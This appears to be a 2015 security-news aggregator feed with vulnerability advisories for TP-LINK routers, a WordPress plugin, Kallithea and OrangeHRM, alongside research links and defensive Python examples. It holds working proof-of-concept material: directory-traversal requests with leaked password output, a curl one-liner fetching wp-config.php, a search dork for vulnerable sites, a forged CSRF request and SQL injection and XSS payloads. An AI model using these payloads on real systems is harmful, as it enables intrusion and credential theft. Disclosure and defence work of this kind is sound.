Channel: BOT24
Viewing all 8064 articles

Wawa Rewards Gift Card Takeover Vulnerability

Wawa stores are a favorite among customers in Pennsylvania, New Jersey, Delaware, and beyond. When the company recently announced a new Android app to launch with their rewards program, I was interested in installing it and researching how it worked. Soon after registering and associating a gift card to my account, I discovered a serious vulnerability that would allow an attacker to arbitrarily associate gift cards to his account. Since the app does not require physical access to the card in order to be used at the register, the attacker could then use the remaining balances on the cards.

more here........http://randywestergren.com/wawa-rewards-gift-card-takeover-vulnerability/

Simple guided fuzzing for libraries using LLVM's new libFuzzer

Fuzzing (or fuzz testing) is becoming increasingly popular. Fuzzing Clang and fuzzing with Clang is not new: Clang-based AddressSanitizer has been used for fuzz-testing the Chrome browser for several years and Clang itself has been extensively fuzzed using csmith and, more recently, using AFL. Now we’ve closed the loop and started to fuzz parts of LLVM (including Clang) using LLVM itself.

LibFuzzer, recently added to the LLVM tree, is a library for in-process fuzzing that uses Sanitizer Coverage instrumentation to guide test generation. With LibFuzzer one can implement a guided fuzzer for some library by writing one simple function:
extern "C" void TestOneInput(const uint8_t *Data, size_t Size);

more here........http://blog.llvm.org/2015/04/fuzz-all-clangs.html

Extracting the Private Key from a TREZOR

There were some discussions on reddit about whether TREZOR can be attacked using side channels such as power fluctuations, electromagnetic radiation or similar. Usually these discussions mention the signing code. To sign a message, you need to enter the PIN first, so signing is not a useful target in the scenario where the attacker has physical access but no PIN and wants to perform a side-channel attack.

However, the generation of the public key may also leak some information via a side channel. Until firmware 1.3.2 of TREZOR, this was not PIN protected. Therefore, I investigated whether it is possible to use a side channel to recover the private key from the public key computation.

more here.........http://johoe.mooo.com/trezor-power-analysis/

SEC Consult SA-20150410-0 :: Unauthenticated Local File Disclosure in multiple TP-LINK products (CVE-2015-3035)

SEC Consult Vulnerability Lab Security Advisory < 20150410-0 >
=======================================================================
              title: Unauthenticated Local File Disclosure
            product: Multiple TP-LINK products (see Vulnerable / tested versions)
 vulnerable version: Multiple (see Vulnerable / tested versions)
      fixed version: see Solution
         CVE number: CVE-2015-3035
             impact: Critical
           homepage: http://tp-link.com
              found: 2015-02-19
                 by: Stefan Viehböck (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"TP-LINK is a global provider of SOHO & SMB networking products and the World's
No.1 provider of WLAN products, with products available in over 120 countries
to tens of millions customers. Committed to intensive R&D, efficient production
and strict quality management, TP-LINK continues to provide award-winning
networking products in Wireless, ADSL, Routers, Switches, IP Cameras, Powerline
Adapters, Print Servers, Media Converters and Network Adapters for Global
end-users."

Source: http://www.tp-link.us/about/?categoryid=102


Business recommendation:
------------------------
Attackers can read sensitive configuration files without prior authentication.
These files e.g. include the administrator credentials and the WPA passphrase.

TP-LINK has provided fixed firmware which should be installed immediately.


Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.


Proof of concept:
-----------------
The following HTTP request shows how directory traversal can be used to gain
access to files without prior authentication:
===============================================================================
GET /login/../../../etc/passwd HTTP/1.1
Host: $host

===============================================================================

The server response includes the contents of the file:
===============================================================================
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive:
Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 683
Content-Type: text/html
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
admin:x:500:500:admin:/home:/bin/sh
guest:x:500:500:guest:/home:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
dropbear:x:500:500:dropbear:/tmp/dropbear:/bin/sh
===============================================================================

Several sensitive files can be read. These include:
Files containing Wi-Fi configuration including WPA-passphrase:
/login/../../../tmp/ath.ap_bss
/login/../../../tmp/ath1.ap_bss

A file containing administrator credentials (format: $user:md5($password)), which can
be brute-forced very efficiently because the hash is unsalted MD5:
/login/../../../tmp/dropbear/dropbearpwd


Example server response:
===============================================================================
HTTP/1.1 200 OK
Server: Router Webserver
Connection: Keep-Alive
Keep-Alive:
Persist:
WWW-Authenticate: Basic realm="TP-LINK Wireless Dual Band Gigabit Router WDR4300"
Content-Length: 56
Content-Type: text/html
username:admin
password:11d0fc2ff3e7862d8a3f9b280e6d390c
===============================================================================


Vulnerable / tested versions:
-----------------------------
The vulnerability affects the following products:
TP-LINK Archer C5 (Hardware version 1.2)
TP-LINK Archer C7 (Hardware version 2.0)
TP-LINK Archer C8 (Hardware version 1.0)
TP-LINK Archer C9 (Hardware version 1.0)
TP-LINK TL-WDR3500 (Hardware version 1.0)
TP-LINK TL-WDR3600 (Hardware version 1.0)
TP-LINK TL-WDR4300 (Hardware version 1.0)
TP-LINK TL-WR740N (Hardware version 5.0)
TP-LINK TL-WR741ND (Hardware version 5.0)
TP-LINK TL-WR841N (Hardware version 9.0)
TP-LINK TL-WR841N (Hardware version 10.0)
TP-LINK TL-WR841ND (Hardware version 9.0)
TP-LINK TL-WR841ND (Hardware version 10.0)


Vendor contact timeline:
------------------------
2015-02-19: Contacting vendor through support@tp-link.com.
2015-02-24: Resending email as previous ticket has been closed by TP-LINK.
2015-02-24: Contacting technical support engineer of TP-LINK, contact received
            by 3rd party.
2015-02-25: Requesting encryption keys, providing affected models.
2015-02-26: No encryption keys available, sending advisory in unencrypted form.
2015-02-28: Vendor confirms vulnerability, provides beta firmware.
2015-03-03: Sending confirmation that beta firmware fixes the vulnerability.
2015-03-06: Vendor is working on release schedule, affected devices.
2015-03-16: Vendor announces that fixed firmware will be released by the end of
            March.
2015-03-24: Vendor confirms that firmware releases are on schedule.
2015-04-08: Vendor provides final list of affected products & download URLs.
2015-04-10: Coordinated release of security advisory.


Solution:
---------
Update to the most recent firmware version:
TP-LINK Archer C5 (Hardware version 1.2): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13048
TP-LINK Archer C7 (Hardware version 2.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13008
TP-LINK Archer C8 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13052
TP-LINK Archer C9 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13020
TP-LINK TL-WDR3500 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13018
TP-LINK TL-WDR3600 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13019
TP-LINK TL-WDR4300 (Hardware version 1.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13009
TP-LINK TL-WR740N (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13012
TP-LINK TL-WR741ND (Hardware version 5.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13013
TP-LINK TL-WR841N (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13033
TP-LINK TL-WR841N (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13036
TP-LINK TL-WR841ND (Hardware version 9.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13035
TP-LINK TL-WR841ND (Hardware version 10.0): http://www.tp-link.com/en/handlers/download.ashx?resourceid=13037


Workaround:
-----------
See solution.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan Viehböck / @2015

The Beginner's Guide to IDAPython (It's Free, But the Author Would Love a Donation for All the Hard Work)

This is a book about IDAPython.
I originally wrote it as a reference for myself - I wanted a place to go where I could find
examples of functions that I commonly use (and forget) in IDAPython. Since I started this
book I have used it many times as a quick reference to understand syntax or see an example
of some code - if you follow my blog you may notice a few familiar faces; lots of the scripts
that I cover here are the result of sophomoric experiments that I documented online.
Over the years I have received numerous emails asking what the best guide for learning
IDAPython is. Usually I point them to Ero Carrera's Introduction to IDAPython or the
example scripts in IDAPython's public repo. They are excellent sources for learning, but
they don't cover some common issues that I have come across. I wanted to create a book
that covers these issues. I feel this book will be of value for anyone learning IDAPython or
wanting a quick reference for examples and snippets. Being an e-book, it will not be a static
document, and I plan on updating it in the future on a regular basis.

more here.......https://leanpub.com/IDAPython-Book

Oh Yeah! Reversing Belkin’s WPS Pin Algorithm

After finding D-Link's WPS algorithm, I was curious to see which vendors might have similar algorithms, so I grabbed some Belkin firmware and started dissecting it. This particular firmware uses the SuperTask! RTOS, and in fact uses the same firmware obfuscation as seen previously on the Linksys WRT120N.

more here.........http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/

eCryptfs v1 hash dictionary

In previous versions of eCryptfs-utils, the signature of the wrapping key consisted of 65337 iterations of SHA-512 over the user password with the default salt 0x0011223344556677. Because the salt is a fixed constant, this makes precomputed dictionary and rainbow-table attacks on the user password of systems using eCryptfs for home folder encryption possible. I provide a precomputed dictionary of the rockyou password list here........https://github.com/sylvainpelissier/ecryptfs-dictionary-v1

Meet 'The Great Cannon', China's audacious new hacking weapon

The relentless days-long cyberattack on GitHub showed that someone was willing to use hundreds of thousands of innocent internet users to try to take down two pages set up by an organization fighting Chinese censorship.

A group of cybersleuths has discovered that someone is indeed China, as everyone suspected. More importantly, they’ve also learned that the attack was carried out with a powerful new cyberweapon, whose existence was previously unknown.

more here.......http://motherboard.vice.com/read/the-great-cannon-is-chinas-powerful-new-hacking-weapon

Exploit for Samba vulnerability (CVE-2015-0240)

Exploit for Samba vulnerability (CVE-2015-0240) by sleepya

The exploit only targets vulnerable x86 smbd < 3.6.24 in which 'creds' is controlled by
the ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value at the 'creds' address.

Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

Note:
- The heap might change while the exploit is running; try again (with the '-hs' or '-pa' option)
  if something fails.

more here..........https://gist.github.com/worawit/051e881fc94fe4a49295

Fusion Engage v1.0.5 (WordPress Plugin) Local File Disclosure

Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.

Anyway, it has an LFD. Here's the relevant code..

function fe_get_sv_html(){
    global $wpdb, $video_db, $ann_db;

    // $_POST['video'] reaches file_get_contents() with no validation at all:
    // any readable local path (or a URL wrapper) is fetched and echoed back.
    print(file_get_contents($_POST['video']));

    wp_die();
}
// The nopriv hook makes the handler reachable by unauthenticated visitors.
add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');
add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');

So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"
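The same root cause sits behind both file-disclosure reports on this page: the TP-LINK web server applied its /login/ rule before collapsing the '..' segments, and fe_get_sv_html() hands $_POST['video'] to file_get_contents() untouched. The following is an added example, not code from TP-LINK, SEC Consult or the plugin (all helper names are my own), showing the two defender-side controls: canonicalise a path before authorising or confining it, and flag traversal attempts in web server access logs.

```python
import os
import posixpath
import re
from urllib.parse import unquote


def canonical_request_path(raw_path: str) -> str:
    """Percent-decode twice (defeats %252e double encoding), unify separators,
    then collapse '.', '..' and '//'. A rule such as "paths under /login/ need
    no authentication" must be applied to this value, never to the raw one."""
    decoded = unquote(unquote(raw_path.split("?", 1)[0])).replace("\\", "/")
    return posixpath.normpath("/" + decoded.lstrip("/"))


def is_traversal_attempt(raw_path: str) -> bool:
    """True when the decoded request path carries a '..' segment."""
    decoded = unquote(unquote(raw_path)).replace("\\", "/")
    return any(seg == ".." for seg in decoded.split("/"))


def confine_to_directory(base_dir: str, user_value: str):
    """Resolve a user-supplied file name inside base_dir, the fix for the
    file_get_contents($_POST['video']) pattern. Returns None for URL-like
    values (file_get_contents() would fetch php:// or http://), absolute
    paths, and anything that escapes base_dir through '..' or a symlink
    (realpath follows symlinks, so the check is made on the final target)."""
    if re.match(r"^[A-Za-z][A-Za-z0-9+.-]*:", user_value) or os.path.isabs(user_value):
        return None
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, user_value))
    if candidate == root or not candidate.startswith(root + os.sep):
        return None
    return candidate


# Constructed access-log lines in common log format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2015:10:00:01 +0000] "GET /login/../../../etc/passwd HTTP/1.1" 200 683
203.0.113.7 - - [10/Apr/2015:10:00:02 +0000] "GET /login/%2e%2e/%2e%2e/%2e%2e/tmp/dropbear/dropbearpwd HTTP/1.1" 200 56
198.51.100.4 - - [10/Apr/2015:10:00:03 +0000] "GET /login/index.htm HTTP/1.1" 200 1402
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def traversal_hits(log_text: str):
    """(client, canonical path, status) for every request carrying '..';
    a 200 on such a request is the sign that the server actually served the file."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m.group(2)):
            hits.append((m.group(1), canonical_request_path(m.group(2)), int(m.group(3))))
    return hits


if __name__ == "__main__":
    for hit in traversal_hits(SAMPLE_LOG):
        print(hit)
    print(confine_to_directory("/var/www/uploads", "../wp-config.php"))  # None
```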

Precious Ngwu cares not at all about support, and last time I found security issues in his products he did not reply to me whatsoever. So, full disclosure on this one straight away, maybe someone else can contact him and "convince" him to put out an update, all I say to that is: good luck...

Quick google dork: inurl:plugins inurl:fusion-engage

- slipstream/raylee - twitter: @TheWack0lian

CVE-2015-0276: Kallithea: Lack of CSRF attack protection enables gaining unauthorised access to users' accounts

We have recently discovered a security issue in Kallithea [0].
The API key of a repository's creator is exposed by the get_repo API method.

Synopsis
========

A vulnerability has been found in Kallithea, allowing attackers to gain
unauthorised access to the account of a logged-in user.

Description
===========

Pages presenting forms to the user and accepting user input do not
carry synchroniser tokens to prevent cross-site request forgery.

It is possible to change an email address of a user by tricking them
into clicking a link that initiates the following HTTP request:

POST /_admin/my_account HTTP/1.1
Host: <DELETED>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://burp/show/1
Cookie: kallithea=<DELETED>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 146


username=myAccount&extern_name=kallithea&extern_type=kallithea&firstname=myFirstname&lastname=myLastname&email=emailAddress%40example.com&save=Save

After this, the attacker requests a password reset; the link is then
sent to the new email address. The attacker then changes the email
address back to the original and does not log out, keeping the session
cookie.

At this point, the attacker has full access to the user's account. The
user can no longer log in (the password has changed) but may assume they
forgot their password, that the account is locked out, or that it has
expired. The user performs a password reset, but the attacker still has
access through the existing session.

Impact
======

The vulnerability allows an attacker to take over the account of an
active user with the help of social engineering. If the user also has
administrator rights, the attacker gains full administrator access to
the Kallithea instance.

Resolution
==========

The Kallithea project has fixed this issue by adding CSRF checks to the
form generation code. Before the fix, none of the forms had CSRF
protection; with the fix, all POST forms are protected against CSRF.

There is no standalone patch, however; instead, it is recommended to
upgrade to the latest 0.2 release, which includes many other changes
and improvements.
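The synchroniser-token pattern the fix introduces, as an added example that is not Kallithea's own code: the form generator emits a hidden token bound to the session, and the POST handler rejects any submission that lacks it, which is exactly the request shown above. The field name `_authentication_token` and all helper names are assumptions for this example.

```python
import hashlib
import hmac
import secrets
from html import escape
from urllib.parse import parse_qs

# Server-side secret generated at start-up (constructed for this example).
SERVER_SECRET = secrets.token_bytes(32)
TOKEN_FIELD = "_authentication_token"   # field name assumed, not Kallithea's


def csrf_token(session_id: str) -> str:
    """Bind the token to the session via HMAC: an attacker's page cannot
    know it (same-origin policy hides the form), and nothing is stored."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_my_account_form(session_id: str, current_email: str) -> str:
    """Form generation now emits the hidden token; this is what the fix adds."""
    return (
        '<form method="post" action="/_admin/my_account">'
        f'<input type="hidden" name="{TOKEN_FIELD}" value="{csrf_token(session_id)}">'
        f'<input name="email" value="{escape(current_email, quote=True)}">'
        '<input type="submit" name="save" value="Save"></form>'
    )


def handle_my_account_post(session_id: str, body: str, account: dict):
    """Return (status, account). The cookie session is taken as valid; only the
    token separates the user's own form from one a third-party page submitted."""
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    submitted = fields.get(TOKEN_FIELD, "")
    if not hmac.compare_digest(submitted, csrf_token(session_id)):
        return 403, account          # reject before touching any state
    updated = dict(account)
    updated["email"] = fields.get("email", account["email"])
    return 200, updated


def simulate():
    """Replay the advisory's forged request, then a genuine submission."""
    session = "kallithea-session-abc"          # constructed cookie value
    account = {"username": "myAccount", "email": "victim@example.com"}
    forged = ("username=myAccount&extern_name=kallithea&extern_type=kallithea"
              "&firstname=myFirstname&lastname=myLastname"
              "&email=attacker%40example.com&save=Save")
    forged_status, account = handle_my_account_post(session, forged, account)
    genuine = f"{TOKEN_FIELD}={csrf_token(session)}&email=new%40example.com&save=Save"
    genuine_status, account = handle_my_account_post(session, genuine, account)
    return forged_status, genuine_status, account["email"]


if __name__ == "__main__":
    print(render_my_account_form("kallithea-session-abc", "victim@example.com"))
    print(simulate())
```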

Affected versions
=================

The issue is currently present in all Kallithea versions before 0.2.

References
==========

[0] Kallithea Project
<https://kallithea-scm.org/>

[1] CVE-2015-0276
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0276>

[2] Kallithea: Security Notice CVE-2015-0276
<https://kallithea-scm.org/security/cve-2015-0276.html>

--
Cheers,
Andrew Shadura
on behalf of Kallithea Security Team

64-bit Linux Stack Smashing Tutorial: Part 1

Hacking the D-Link DIR-890L

The past 6 months have been incredibly busy, and I haven’t been keeping up with D-Link’s latest shenanigans. In need of some entertainment, I went to their web page today and was greeted by this atrocity:
D-Link’s $300 DIR-890L router
I think the most “insane” thing about this router is that it’s running the same buggy firmware that D-Link has been cramming in their routers for years…and the hits just keep on coming.

Hookish

VBS Malware Tied To Media Attacks

Malware that is being tied to the recent cyber attack in France is detected by Trend Micro as a variant of the NJWORM/KJWORM remote access Trojan (RAT). This malware (with the MD5 hash 2962c44ce678d6ca1246f5ead67d115a), which we detect as VBS_KJWORM.SMA, is a backdoor that may have been around since 2014.

Ties to previous targeted attacks

Our initial analysis shows that VBS_KJWORM.SMA was created by a hacking tool named Sec-wOrm 1.2 Fixed vBS Controller. This is a RAT generator that we detect as HKTL_KJWORM.

more here.............http://blog.trendmicro.com/trendlabs-security-intelligence/

Reverse Engineering Vectored Exception Handlers: Functionality (2/3)

OrangeHRM Blind SQL Injection & XSS Vulnerabilities

I. Overview
========================================================
OrangeHRM (Open Source 3.2.1, Professional & Enterprise 4.11) is prone to multiple blind SQL injection and XSS vulnerabilities. They allow an attacker to inject SQL commands and compromise the database management system behind the HRM application, perform operations on behalf of the affected victim, redirect them to malicious sites, steal their credentials, and more.

II. Severity
========================================================
Rating: High
Remote: Yes
Authentication Required: Yes
CVE-ID:

III. Vendor's Description of Application
========================================================

OrangeHRM Solutions

Effective HR tools and options to suit your needs Start-up, SME, global enterprises, whichever one you may be, OrangeHRM offers you flexibility and freedom to select from free and paid versions of OrangeHRM backed with specialized expertise. Our HR modules cover many major human capital management extents. OrangeHRM is used by millions of users around the world in all industries. Explore our solutions and contact our consultants to assist you with your selection process.

http://www.orangehrm.com/


IV. Vulnerability Details & Exploit
========================================================
1) Blind SQL Injection


Request Method = GET

a) /symfony/web/index.php/leave/getFilteredEmployeeCountAjax?location=-1)+or+(31337=31337)+and+(20=20&subunit=0

Request Method = POST

b) /symfony/web/index.php/recruitment/viewCandidates
           sortField=[BSQLi]

__________________________________________________________

2) Multiple Reflected XSS

Request Method = GET

a) /symfony/web/index.php/admin/saveJobTitle?jobTitleId=1';+confirm(0);+//

Request Method = POST

b) /symfony/web/index.php/performance/saveReview
          saveReview360Form[reviewId] = [XSS Payload]
          saveReview = [XSS Payload]


VI. Affected Systems
========================================================
Software: OrangeHRM
Version:  OrangeHRM Open Source 3.2.1 or prior
          OrangeHRM Professional & Enterprise 4.11 or prior
Solution (Fix): No

VII. Vendor Response/Solution
========================================================
Vendor Contacted : 02/12/2015
Vendor Response : 02/12/2015
Shared Technical Details/Poc : 02/13/2015
Again Vendor Contacted : 03/04/2015
Vendor Response: No Response
Advisory Release : 04/10/2015

VIII. Credits
========================================================
Discovered by Rehan Ahmed
knight_rehan@hotmail.com

Introducing filighting and the future of DFIR tools, part 3 – more examples

Huthos VPS Provider: Totally legit, 1000% not a criminal organization

Facts and Myths about Python names and values - PyCon 2015 (Video)

The behavior of names and values in Python can be confusing. Like many parts of Python, it has an underlying simplicity that can be hard to discern, especially if you are used to other programming languages.

more here.........https://www.youtube.com/watch?v=_AEJHKGk9ns